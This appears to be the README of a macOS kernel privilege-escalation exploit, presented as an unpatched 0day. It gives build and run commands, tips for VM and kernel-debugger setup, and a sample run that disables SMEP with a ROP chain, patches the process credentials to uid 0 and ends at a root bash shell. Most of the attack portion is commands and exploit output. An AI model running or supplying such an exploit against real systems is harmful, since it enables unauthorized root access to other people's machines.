macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ;) ).

Thanks to @LinusHenze for this cool bug and his support ;P.

Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started:

• VM: Download the macOS installer from the appstore and drag the .app file into VMWare's NEW VM window
• Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
• Have a look at the _kernel_trap function

You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit)

make

./exploit <KASLR slide>

NOTE: a KASLR leak is required in order for the exploit to do more that just freezing the system so it's not that bad :)

Example:

[debug@Kernel-Mac Shared ]$ ./exploit 0x1600000
[*] Kernel slide: 0x1600000
[*] uid=0x1f5 euid=0x1f5 gid=0x14 egid=0x14
[*] Mapped NULL Page to catch GS accesses
[*] Fake Thread is at: 0x10000
[*] Fake Stack is at: 0x5d000000
[+] SAVED_STATE32 setup done!
[DEBUG] escalatePrivs: 0xa7b39
[DEBUG] SMEP disable ROP-Chain:
70 92 82 01 80 FF FF FF  E0 06 06 00 00 00 00 00  |  p...............
13 B6 A0 01 80 FF FF FF  39 7B 0A 00 00 00 00 00  |  ........9{......
[DEBUG] Waiting...
[+] Here we go...
[+] Userland shellcode says hi!
[*] Patched uid=0x0 euid=0x0 gid=0x14 egid=0x14
bash-3.2#